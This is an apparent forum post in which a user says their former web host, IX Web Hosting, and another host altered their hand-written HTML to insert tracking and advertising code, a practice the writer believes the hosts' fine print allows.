I used to have IX Web Hosting. I noticed on more than one occasion my HTML was being changed. I, too, wrote mine in Notepad so I knew it wasn't added by my software. All permissions were set, and my password was a random string of 14 characters and numbers that I have used some derivative of for the past 20 years..Then again, anything can be hacked, but seriously..who would hack a website to insert tracking/advertising code? Last I checked Walmart doesn't have a hacking department.
What I learned from that experience and another exactly like it at another host is that the host DOES change your code. They may not admit it if you call, but if you read their fine print they have permission to do so. The pay sites don't go so far as the obnoxious banners of Geocities, Yahoo, or Tripod, but they most certainly do insert tracking and advertisements into your site.
